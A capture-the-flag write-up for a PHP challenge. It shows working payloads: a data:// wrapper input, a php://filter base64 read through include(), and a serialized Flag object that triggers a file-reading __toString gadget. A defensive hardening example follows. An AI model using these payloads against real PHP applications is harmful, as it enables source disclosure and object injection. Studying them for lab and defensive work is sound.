
Key points:
(1) file_get_contents($text,'r')
(2) include($file)
(3) $password = unserialize($password);
echo $password;
1. Making a variable read back as file content (data:// wrapper)
text=data://text/plain,welcome to the zjctf
2. File inclusion through include($file)
file=php://filter/convert.base64-encode/resource=useless.php
3. Deserialization
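Source code
```php
<?php
class Flag{ //flag.php
    public $file;
    // Runs whenever a Flag object is used as a string (for example by echo)
    public function __tostring(){
        if(isset($this->file)){
            // Reads whatever path the (attacker-controlled) property holds
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
```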
Constructing the payload
```php
<?php
class Flag{
    public $file='flag.php';
}
$a=new Flag;
// Prints O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
echo serialize($a);
?>
```
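The source above contains echo $password. After unserialize(), $password is a Flag object, so the echo converts it to a string and triggers __toString().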
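
The three key points above, seen from the defending side, as an added example that is not part of the original write-up or the challenge code. The `Flag` stand-in, the `$allowed` page map and all function names are assumptions made for illustration.

```php
<?php
// Added example: hardened handling of the text, file and password inputs.
// Flag is a constructed stand-in for the challenge class; it returns a marker
// string instead of reading a file, so the script is safe to run anywhere.
class Flag {
    public $file;
    public function __toString() {
        return isset($this->file) ? "gadget fired for {$this->file}" : "";
    }
}

// (1) Refuse any value that starts with a URI scheme (data:, php:, ...)
//     before a file function sees it. Note this also rejects "C:\..." paths.
function is_plain_path(string $p): bool {
    return !preg_match('#^[a-z][a-z0-9+.\-]*:#i', $p);
}

// (2) Map the request parameter to a file through a fixed allow-list
//     instead of passing the raw value to include().
function resolve_include(string $name): ?string {
    $allowed = ['useless' => 'useless.php'];   // hypothetical page map
    return $allowed[$name] ?? null;
}

// (3) Deserialize without instantiating any class, then accept only a string.
//     An object payload becomes __PHP_Incomplete_Class and is discarded,
//     so __toString() is never reached.
function safe_password(string $raw): ?string {
    $v = @unserialize($raw, ['allowed_classes' => false]);
    return is_string($v) ? $v : null;
}

// Constructed sample inputs, taken from the three steps of the write-up.
$obj = new Flag;
$obj->file = 'flag.php';
$samples = [
    'text wrapper'    => is_plain_path('data://text/plain,welcome to the zjctf'),
    'filter include'  => resolve_include('php://filter/convert.base64-encode/resource=useless.php'),
    'listed include'  => resolve_include('useless'),
    'object password' => safe_password(serialize($obj)),
    'string password' => safe_password(serialize('constructed-password')),
];
var_dump($samples);
```

Where the password only needs to be a scalar, replacing `unserialize()` with `json_decode()` removes the object-injection path entirely.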